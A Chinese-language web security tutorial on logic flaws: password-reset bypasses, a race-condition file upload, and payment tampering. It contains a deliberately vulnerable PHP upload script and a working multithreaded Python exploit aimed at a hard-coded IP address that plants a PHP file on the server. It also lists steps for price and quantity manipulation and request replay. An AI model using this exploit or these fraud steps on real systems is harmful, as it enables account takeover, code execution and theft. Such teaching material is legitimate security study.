逻辑漏洞是一种业务逻辑上的设计缺陷,业务流存在问题。
这里说一下密码找回漏洞、多线程条件竞争漏洞和支付漏洞。
1、 测试流程 先尝试正确的密码找回流程,记录不一样找回方式的全部数据包 分析数据包,找到有效数据部分 推测数据构造方法 构造数据包验证猜想 二、 分类 * 邮箱找回 通常是点击邮件中的连接后会转跳到修密码的页面,这就须要分析连接的token构造了, 能够考虑是时间戳md五、用户名或邮箱和随机字符串md5等,通常是相似以下连接: http://domain/findpwd.php?u=xiaoming&token=MTIzQHFxLmNvbQ==
http://domain/findpwd.php?id=374&token=2ad64bf14c714dbce88c7993663da7da
当构造相应连接时就能够重置任意用户的密码 * 手机短信找回 短信找回通常就是4位或6位验证码,暴力猜想吧 * 找回逻辑错误 若恶意用户A用15123333333找回密码,此时收到验证码但不使用 此时恶意用户A再用受害者B的手机号找回密码 用户A在B的验证表单填入本身收到的验证码,发送 此时跳转的修改密码页面修改的就是用户B的密码 * 直接修改密码 在修改密码时跳过选择找回方式,直接访问修改密码的页面进行修改 * 本地验证 随意输入一个验证码,开Burp抓包,forward,抓返回包,返回包里可能有一个flag字段, 若flag的值为1则跳转到修改密码页面,因此只要修改返回包便可 * 服务端将验证码返回给浏览器 在点击获取验证码时,服务器会将验证码发送给浏览器,抓包便可 * 验证码直接出如今url中 当点击获取验证码时发出的请求连接中直接有code * 密保问题找回 回答密保问题,有时一些答案就在html源码里
多线程条件竞争漏洞是一种服务端的漏洞,服务端是并发处理用户请求的,
若并发处理不当或相关操做逻辑设计有缺陷时就会产生一些安全问题。
如文件上传和一些数据库操做
//uploads.php代码以下,仅供测试:
<meta charset='utf-8'>
<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./uploads/";
$filename = $_FILES['myfile']['name'];
if (is_uploaded_file($_FILES['myfile']['tmp_name'])){
if (!move_uploaded_file($_FILES['myfile']['tmp_name'],$path.$filename)){
die("error:can not move!");
}
} else {
die("error:not an upload file!");
}
echo "file upload success.file path is: ".$path.$newfile."\n<br />";
if ($_FILES['myfile']['error']>0){
unlink($path.$newfile);
die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['myfile']['name']));
if (!in_array($ext,$allowtype)){
unlink($path.$newfile);
die("error:upload the file type is not allowed,delete the file!");
}
?>
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
import threading
import time
"""
200个线程上传文件aa.php,同时200个线程同时请求aa.php,aa.php中内容为
<?php fputs(fopen("info.php","w"),"<?php phpinfo(); ?>") ?>,
只要aa.php被请求成功就会生成内容为<?php phpinfo(); ?>的php文件info.php
"""
is_exit = False
def create_info():
global is_exit
while not is_exit:
url = "http://123.206.78.20/u/aa.php"
resp = requests.get(url)
def put_file():
global is_exit
file = {'myfile':('aa.php',open('C:/Users/Administrator/Desktop/aa.php'),'application/octet-stream')}
upload_url = "http://123.206.78.20/u.php"
while not is_exit:
requests.post(upload_url,files=file)
def check_info():
global is_exit
print "start threading check info.php:"
url = "http://123.206.78.20/u/info.php"
while True:
print "check info.php..."
resp = requests.get(url)
if resp.status_code == 200:
is_exit = True
print "create file info.php success."
break
for x in xrange(1,200):
t = threading.Thread(target=create_info)
t.setDaemon(True)
t.start()
print "start create_into threading %d" % x
for x in xrange(1,200):
t = threading.Thread(target=put_file)
t.setDaemon(True)
t.start()
print "start put_file threading %d" % x
t = threading.Thread(target=check_info)
t.setDaemon(True)
t.start()
try:
while t.isAlive():
pass
time.sleep(1)
except KeyboardInterrupt:
print 'stopped by keyboard'
在数据库进行update、delete等操做时使用多线程请求,可在一次
update时间内完成屡次update,和上面的文件上传实际上是一个原理
攻击者经过修改交易金额、交易数量等从而利用漏洞, 如Burp修改交易金额、使交易数量为负数或无限大等。 * 在支付时直接修改数据包中的支付金额,实现小金额购买大金额商品 * 修改购买数量,使之为负数,可购买负数量商品,从而扣除负积分,即增长积分, 或使购买数量无限大,无限大时则程序可能处理出错,从而实现0金额支付 * 请求重放,在购买成功后重放请求,可实现"一次购买对此收货"